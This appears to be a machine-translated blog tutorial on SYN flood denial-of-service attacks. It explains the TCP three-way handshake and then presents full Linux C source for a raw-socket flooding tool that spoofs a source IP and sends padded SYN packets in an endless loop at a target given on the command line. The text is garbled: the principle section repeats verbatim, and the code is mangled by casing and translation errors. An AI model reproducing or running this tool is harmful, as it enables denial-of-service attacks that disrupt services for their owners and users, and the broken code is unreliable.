Programming the use of the original socket DOS (denial of service) attack program __ Programming

0x00 principle

SYN flood attack (SYN Flood) is one of the most popular DOS and DDoS methods, due to the defect of TCP protocol. An attack by an attacker by sending a large number of spoofed TCP connection requests, thereby exhausting the attacker's resources (full CPU load or low memory).

The first step is to understand the normal TCP connection establishment process.

(1) The client sends a TCP message with a flag as SYN and sets a SEQ serial number x.

(2) The server received this message, and then immediately sent a flag for syn+ack message, it is important that the server will also send a SEQ serial number, as a client authentication input, and also to reply to an ACK field to confirm that this ACK is x+ 1,x is the SEQ number that the client first steps out. At this point, the server starts allocating some resources, although the connection is not formally established now.

(3) The client received this message from the server, and then reply to a flag for ACK acknowledgement message, ACK is the server side of the Y plus 1, when a TCP connection is fully established.

0x00 principle

SYN flood attack (SYN Flood) is one of the most popular DOS and DDoS methods, due to the defect of TCP protocol. An attack by an attacker by sending a large number of spoofed TCP connection requests, thereby exhausting the attacker's resources (full CPU load or low memory).

The first step is to understand the normal TCP connection establishment process.

(1) The client sends a TCP message with a flag as SYN and sets a SEQ serial number x.

(2) The server received this message, and then immediately sent a flag for syn+ack message, it is important that the server will also send a SEQ serial number, as a client authentication input, and also to reply to an ACK field to confirm that this ACK is x+ 1,x is the SEQ number that the client first steps out. At this point, the server starts allocating some resources, although the connection is not formally established now.

(3) The client received this message from the server, and then reply to a flag for ACK acknowledgement message, ACK is the server side of the Y plus 1, when a TCP connection is fully established.

int skfd;
   Socket (AF_INET,SOCK_RAW,IPPROTO_TCP)

As mentioned earlier, in order to construct the IPV4 header yourself, you must set the corresponding socket field, because SYN flood to construct a false IP source field, so this place should be noted. This option is IP_HDRINCL, and if turned on, the starting position of the data that the process lets the kernel send is the first byte of the IP header, and the amount of data written by the process call output function must include the size of the IP header. The entire IP header is constructed by the process, but the IPV4 identity field can be set to 0 to tell the kernel to have the value, and the IPV4 option field is optional. The SET socket option can be implemented using the following code:

if (0>setsockopt (skfd,ipproto_ip,ip_hdrincl,&on,sizeof (ON)) {
	perror ("Ip_hdrincl failed");
	Exit (1);
   }

On above is an integer constant, which is 1.

We know that TCP is based on IP, so there is a way to construct the IP message, we only need to add the TCP message on the basis of the IP message. This requires that we follow the TCP protocol specification and compute the checksum ourselves. The TCP message structure is defined as follows:

Defines the TCP header
typedef struct _TCPHDR
{unsigned short
   th_sport;//16-bit source port
   unsigned short th_dport;// 16-bit destination port
   unsigned int th_seq//32-bit serial number
   unsigned int th_ack;//32-bit acknowledgment number
   unsigned char th_lenres;//4-bit header length/4-bit reserved word
   unsigned char th_flag//6-bit flag bit
   unsigned short Th_win//16-bit window size
   unsigned short th_sum;//16-bit checksum
   unsigned short th_urp; 16-bit emergency data offset
} tcp_header;

We only need to populate the IP packets on the basis of these fields and load in the IP packet can be, the point is that the flag is set to SYN, the checksum field is to use pseudo-head calculation, pseudo-headers are defined as follows:

typedef struct PSD_HDR
{
	unsigned long saddr;
	//Source address unsigned long daddr;//Destination address
	char Mbz; 
        Char PTCL; Protocol type
	unsigned short tcpl;//tcp length
}psd_header;

You must be careful when calculating the checksum, and the error will cause the package to go wrong.

In order to increase the processing time of the other side, we can add some padding information after the TCP/IP message, make the whole package into the maximum 64K, so that the attack can be more effective, of course, there is a greater demand for its own bandwidth.

After the message construction is complete, the next step is to send it. The raw socket normal output is completed by calling SendTo or sendmsg and specifying the destination IP address. Of course, if the socket is already connected, you can also call write or send.

0x02 realize source Sharing

The execution effect is as follows:

This is a screenshot of the Wireshark grab result in the attacked host. Can see, 10.10.20.132 is I forged an IP, and the important performance is 10.10.10.128 (the attacked host) has been retransmission Syn+ack, because the IP address is forged, so will not receive any response, but has been sent back.

This DOS program is based on Linux C, because to be honest, I'm not really cool with Windows programming, and it's not going to happen. About this program, you can improve the source IP to make random values, but here I do not do this for testing. Nonsense not much to say, directly on the code.

#include <stdlib.h> #include <stdio.h> #include <errno.h> #include <string.h> #include < unistd.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/ in.h> #include <netinet/ip.h> #include <errno.h> #include <arpa/inet.h> #include <linux/tcp.h
	> #include <pthread.h> #include <fcntl.h>//define TCP pseudo-header typedef struct PSD_HDR {unsigned long saddr;//Source Address unsigned long daddr; Destination Address char Mbz; Char PTCL; Protocol type unsigned short tcpl;

TCP length}psd_header; Defines the TCP header typedef struct _TCPHDR {unsigned short th_sport;//16-bit source port unsigned short th_dport;//16-bit destination port unsigned int th _seq; 32-bit serial number unsigned int th_ack; 32-bit Confirmation number unsigned char th_lenres; 4-bit header length/4-bit reserved character unsigned char th_flag; 6 bit sign bit unsigned short th_win; 16-bit window size unsigned short th_sum; 16-bit checksum unsigned short th_urp;


16-bit emergency data offset} Tcp_header; Defines IP header typedef struct _IPHDR {unsigned char h_lenver;//Length PlusThis number unsigned char tos;  Service type unsigned short total_len;  Packet length unsigned short ident;  Marked, can be placed to 0 unsigned short frag_and_flags;  Flag bit unsigned char ttl;  Survival period unsigned char proto;  Protocol field unsigned short checksum;  checksum unsigned int sourceip;  source IP unsigned int destip;

Destination IP} Ip_header;
	   Computes checksum unsigned short checksum (unsigned short *addr,int len) {int nleft=len;
	   int sum=0;
	   unsigned short * W=ADDR;

	   unsigned short answer=0;
	     while (nleft>1) {sum+=*w++;
	   nleft-=2;
	     } if (nleft==1) {* (unsigned char *) (&answer) =* (unsigned char *) W;
	   Sum+=answer;
	   } sum= (sum>>16) + (sum & 0xFFFF);
	   sum+= (SUM&GT;&GT;16);
	   Answer=~sum;
return (answer);
	} void Attack (int skfd,struct sockaddr_in*target,unsigned short srcport) {char buf[65535] = {0};
	struct _IPHDR IP;
	struct _TCPHDR TCP;
	int Ip_len;
	struct PSD_HDR psdheader;
	struct sockaddr_in srcaddr; SRCADDR.SIN_ADDR.S_ADDR = inet_addr ("10.10.20.132 ");
	struct sockaddr_in _target;
	_target.sin_family= af_inet;
	_target.sin_port = Target->sin_port;

	_TARGET.SIN_ADDR.S_ADDR = target->sin_addr.s_addr;

	Ip_len = sizeof (struct IPHDR) + sizeof (struct TCPHDR);
	Start populating IP Header ip.h_lenver = (4 << 4 | sizeof (IP)/sizeof (unsigned long));
	Ip.total_len = htons (sizeof (TCP) + sizeof (IP));
	IP packet Destination IP address ip.destip = target->sin_addr.s_addr;
	IP packet Source IP address (can be forged) Ip.sourceip = SRCADDR.SIN_ADDR.S_ADDR;
	Upper layer protocol TCP Ip.proto = ipproto_tcp;
	The 3-bit sign bit can be segmented df=0 back without package mf=0 ip.frag_and_flags = 0;
	16-bit checksum ip.checksum = 0;
	Survival period Maxttl Ip.ttl = 128;

	16-bit logo ip.ident = 1;
	Start populating TCP Header//Fill TCP//destination port tcp.th_dport = Target->sin_port;
	SOURCE Port Tcp.th_sport = htons (50000);
	Serial number TCP.TH_SEQ = Htonl (0x1245678);
	Confirmation number Tcp.th_ack = 0;
	(4-bit header length/4-bit reserved word) Tcp.th_lenres = (sizeof (TCP)/4 << 4 | 0);
	SYN flag Tcp.th_flag = 2;//syn//sliding window Tcp.th_win = htons (16384);
	16-bit emergency data offset tcp.th_urp = 0; 16-bit checksum tcp.th_sum = 0;
	TCP pseudo-head PSDHEADER.MBZ = 0;
	PSDHEADER.DADDR = target->sin_addr.s_addr;
	PSDHEADER.SADDR = srcaddr.sin_addr.s_addr;
	PSDHEADER.PTCL = ipproto_tcp;

	psdheader.tcpl = htons (sizeof (TCP));
	Compute the checksum memcpy (buf,&psdheader,sizeof (Psdheader));
	memcpy (Buf+sizeof (Psdheader), &tcp,sizeof (TCP));

	Tcp.th_sum = checksum (unsigned short*) buf,sizeof (Psdheader) +sizeof (TCP));
	IP checksum memcpy (buf,&ip,sizeof (IP));
	memcpy (buf+sizeof (IP), &tcp,sizeof (TCP));

	Ip.checksum = checksum (unsigned short*) buf,sizeof (IP) +sizeof (TCP));

	memcpy (buf,&ip,sizeof (IP));
	payload int len = sizeof (BUF)-sizeof (IP)-sizeof (TCP);
	printf ("here===>%d\n", Len);
	Char Payload[len];
	int i = 0;
	for (i=0;i<len;i++) {payload[i] = ' 2 ';

       } memcpy (Buf+sizeof (IP) +sizeof (TCP), payload,sizeof (payload)); Send package for (;;) {if (SendTo (skfd,buf,sizeof (TCP) +sizeof (IP), 0, (struct sockaddr*) &_target,sizeof (_target)) = = 1) {printf ("send error:%s!\n ", strerror (errno));
	  Exit (-1);
	  }else{printf ("Send ok!\n"); }//for} int main (int args,char* argv[]) {if (args!= 4) {printf (usage:ddos_attack targetip targetport srcport\
		n ");
	Exit (-1);
	int SKFD;
	struct sockaddr_in target;
	const int on = 1;

	unsigned short srcport;

	memset (&target,0,sizeof (target));
	Fill in the target information target.sin_family = af_inet;
	Target.sin_port = htons (atoi (argv[2));

	TARGET.SIN_ADDR.S_ADDR = inet_addr (argv[1]); Create a native socket if ((SKFD = socket (af_inet,sock_raw,ipproto_tcp)) < 0) {printf ("Create Socket failed!%s\n", strerror (E
		Rrno));
	Exit (-1);
		///using the template code to open the Ip_hdrincl feature, we completely ourselves manually construct the IP message if (0>setsockopt (skfd,ipproto_ip,ip_hdrincl,&on,sizeof (on)) {
		Perror ("Ip_hdrincl failed");
     Exit (1);
	//start attack function srcport = Atoi (argv[3]);
	Attack (Skfd,&target,srcport);
	Close (SKFD);
return 0;


 }

In addition, reprint please indicate the source: http://blog.csdn.net/u011721501?viewmode=list